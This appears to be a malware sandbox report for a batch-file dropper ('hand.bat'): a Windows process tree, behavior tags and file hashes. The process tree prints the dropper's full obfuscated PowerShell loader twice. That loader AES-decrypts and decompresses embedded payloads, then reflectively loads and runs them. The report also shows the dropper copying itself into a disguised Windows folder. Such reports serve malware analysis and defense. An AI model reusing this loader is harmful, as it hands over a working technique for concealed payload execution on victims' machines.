C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1172
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2104
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2480
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2532
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2616
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /R /T2⤵
- Drops file in System32 directory
PID:1380
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2624
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:808
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3080
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3372 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hand.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\system32\cmd.execmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); $jPJwb.IV=[System.Convert]::FromBase64String('II7XtEw/4tOoxMX0yT4prg=='); $kNTLM=$jPJwb.CreateDecryptor(); $whegU=$kNTLM.TransformFinalBlock($leKgl, 0, $leKgl.Length); $kNTLM.Dispose(); $jPJwb.Dispose(); $whegU;}function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$UAPJw=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $SDRXH.CopyTo($UAPJw); $SDRXH.Dispose(); $kWPKo.Dispose(); $UAPJw.Dispose(); $UAPJw.ToArray();}function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$bdjtW = 'C:\Users\Admin\AppData\Local\Temp\hand.bat';$host.UI.RawUI.WindowTitle = $bdjtW;$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);foreach ($fLYEN in $sWPvP) { if ($fLYEN.StartsWith('ECVXS')) { $GELOT=$fLYEN.Substring(5); break; }}$XQqqI=[string[]]$GELOT.Split('\');Invoke-Expression '$gOc = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$saB = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UaX = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');efQtH $gOc $null;efQtH $saB $null;efQtH $UaX (,[string[]] (''));3⤵PID:4308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\hand.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
PID:4724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵PID:2380
-
C:\Windows\system32\cmd.execmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); $jPJwb.IV=[System.Convert]::FromBase64String('II7XtEw/4tOoxMX0yT4prg=='); $kNTLM=$jPJwb.CreateDecryptor(); $whegU=$kNTLM.TransformFinalBlock($leKgl, 0, $leKgl.Length); $kNTLM.Dispose(); $jPJwb.Dispose(); $whegU;}function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$UAPJw=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $SDRXH.CopyTo($UAPJw); $SDRXH.Dispose(); $kWPKo.Dispose(); $UAPJw.Dispose(); $UAPJw.ToArray();}function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$bdjtW = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $bdjtW;$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);foreach ($fLYEN in $sWPvP) { if ($fLYEN.StartsWith('ECVXS')) { $GELOT=$fLYEN.Substring(5); break; }}$XQqqI=[string[]]$GELOT.Split('\');Invoke-Expression '$gOc = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$saB = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UaX = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');efQtH $gOc $null;efQtH $saB $null;efQtH $UaX (,[string[]] (''));5⤵PID:3692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3548
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4016
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4068
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3636
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:2560
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2680
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1464
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2056
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4184
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:2252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
PID:1420
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000110 0000008c1⤵PID:3152
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000104 0000008c1⤵PID:4800
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000e0 0000008c1⤵PID:3176
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 0000010c 0000008c1⤵PID:2904
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:4884
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000114 0000008c1⤵PID:3440
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000104 0000008c1⤵PID:4064
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000f0 0000008c1⤵PID:4348
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000118 0000008c1⤵PID:4664
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000c0 0000008c1⤵PID:3692
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000100 0000008c1⤵PID:3504
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000138 0000008c1⤵PID:3504
-
C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000104 0000008c1⤵PID:5060
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5da760f8b53fcde92d67d6a610f0a4707
SHA18c75b58f43455329c26520540461832bb90bffeb
SHA2561435d59e62d35d663ae54ca74cebd76a20b00380e3aa189b5d9567cdce7e7528
SHA51290e62d0fe87dfc7810cbf864d6a984f2b4c24add105f18d375221d2e0f7637f7a1c2e34afe92dcbfccb5a435e8dd6c4ca87a9d79a0fff29bd79a0ac21846e3e0
-
Filesize
1KB
MD5aedb4691b4a410acfe415bdf5817c0d9
SHA1acdbec00fdeb48253388f5fa7439e26cbfdebe7d
SHA256cc4e216fe6e882b37196e3a34129e18d386c2541c6527297b84e0350b212cb42
SHA5121712ac283dc4675ed270c62a0599302a2f3974e2668d1a6b04216b0819800b3e7bef124ba497767bd12c9f887ce34239eb4508a4220a6ba6e75393a370a8fc4e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7.0MB
MD51a013c7ac90b58073895b26cae70def7
SHA160c9c3294fc7ac3d336a478274f62f4818498230
SHA256698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688
SHA512c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75